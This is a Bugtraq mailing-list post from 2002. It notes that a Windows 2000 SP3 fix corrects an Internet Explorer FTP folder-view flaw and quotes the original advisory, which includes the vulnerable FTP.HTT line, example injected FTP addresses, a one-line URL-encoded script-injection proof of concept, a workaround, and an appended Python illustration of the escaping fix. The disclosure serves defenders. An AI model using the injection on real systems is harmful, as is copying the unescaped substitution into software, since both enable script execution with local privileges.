This problem (BugtraqID:4954) was corrected in Windows 2000 Service Pack 3.

Windows2000 SP3 (Q316890)
http://support.microsoft.com/default.aspx?scid=kb;en-us;q316890

Regards,

------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik@geocities.co.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
------------------------------------------------------

----- Original Message -----
From: "Eiji James Yoshida" <ptrs-ejy@bp.iij4u.or.jp>
To: <bugtraq@securityfocus.com>
Sent: Friday, June 07, 2002 12:33 AM
Subject: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

> + Title:
> ~~~~~~~~~~~~~~~~~
> Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability
>
> + Date:
> ~~~~~~~~~~~~~~~~~
> 7 June 2002
>
> + Author:
> ~~~~~~~~~~~~~~~~~
> Eiji James Yoshida [zaddik@geocities.co.jp]
>
> + Risk:
> ~~~~~~~~~~~~~~~~~
> Medium
>
> + Vulnerable:
> ~~~~~~~~~~~~~~~~~
> Windows2000 SP2 IE5.5SP1
> Windows2000 SP2 IE5.5SP2
> Windows2000 SP2 IE6.0
>
> + Overview:
> ~~~~~~~~~~~~~~~~~
> IE allows running malicious scripts due to a bug in 'Folder View for FTP sites'.
>
> If you enable both the 'Enable folder view for FTP sites' IE Advanced Setting
> and the 'Enable Web content in folders' Explorer Folder Option,
> the script embedded in the FTP server address will run.
> (Both options are set to 'Enable' by default.)
>
> * It's important that the script runs in the My Computer zone!
>
> + Details:
> ~~~~~~~~~~~~~~~~~
> The problem is in FTP.HTT, invoked by the 'folder view for FTP sites' feature.
> ( %SystemRoot%\WEB\FTP.HTT )
>
> --------------------FTP.HTT--------------------
> 35: <BASE href="%THISDIRPATH%\">
> -----------------------------------------------
>
> This '%THISDIRPATH%' is not escaped.
>
> (Example 1)
> [ ftp://TARGET ]
> '%THISDIRPATH%' = 'ftp://TARGET/'
> <BASE href="ftp://TARGET/\">
>             ~~~~~~~~~~~~~
> (Example 2)
> [ ftp://"><script>alert("Exploit");</script> ]
> '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
> <BASE href="ftp://"><script>alert("Exploit");</script>/\">
>             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> + Exploit code:
> ~~~~~~~~~~~~~~~~~
> <a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>
>
> + Demonstration:
> ~~~~~~~~~~~~~~~~~
> http://www.geocities.co.jp/SiliconValley/1667/advisory02e.html
>
> + Workaround:
> ~~~~~~~~~~~~~~~~~
> Disable either the 'Enable folder view for FTP sites' IE Advanced Setting
> or the 'Enable Web content in folders' Explorer Folder Option.
>
> + Vendor status:
> ~~~~~~~~~~~~~~~~~
> Microsoft was notified on 21 December 2001.
>
> ----------------------------------------------------------------------
> Eiji "James" Yoshida
> penetration technique research site
> E-mail: zaddik@geocities.co.jp
> URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
> ----------------------------------------------------------------------
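The unescaped substitution the advisory describes, shown in an added example that is not part of the original post or of Windows: it renders the quoted FTP.HTT line with and without HTML-attribute escaping and feeds the result to Python's html.parser to list the tags a browser-style parser would see. The escaping via html.escape is an assumed fix for illustration, not Microsoft's actual SP3 change; the inputs are the advisory's own two examples.

```python
import html
from html.parser import HTMLParser

# Line 35 of FTP.HTT as quoted in the advisory; Explorer substitutes the
# FTP URL being browsed for %THISDIRPATH% before the browser renders it.
FTP_HTT_LINE = '<BASE href="%THISDIRPATH%\\">'

# Constructed inputs taken from the advisory's Example 1 and Example 2.
BENIGN_DIRPATH = "ftp://TARGET/"
ADVISORY_DIRPATH = 'ftp://"><script>alert("Exploit");</script>/'


def render_unescaped(dirpath):
    """Plain textual substitution, which is what the advisory says FTP.HTT does."""
    return FTP_HTT_LINE.replace("%THISDIRPATH%", dirpath)


def render_escaped(dirpath):
    """Assumed fix: escape &, <, >, " and ' so the value cannot close the attribute."""
    return FTP_HTT_LINE.replace("%THISDIRPATH%", html.escape(dirpath, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag (with decoded attributes) the parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(rendered):
    """Return the tag names a browser-style parser sees in the rendered line."""
    collector = TagCollector()
    collector.feed(rendered)
    collector.close()
    return [name for name, _ in collector.tags]


def base_href(rendered):
    """Return the href of the first <base> tag after entity decoding, or None."""
    collector = TagCollector()
    collector.feed(rendered)
    collector.close()
    return next((attrs.get("href") for name, attrs in collector.tags if name == "base"), None)


if __name__ == "__main__":
    for label, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        out = render(ADVISORY_DIRPATH)
        print(f"{label}: {out}\n  tags seen: {parse_tags(out)}")
```

With escaping, the parser still sees exactly one tag and recovers the full URL as the href value; without it, the value ends at the first raw quote and a second, script, tag appears.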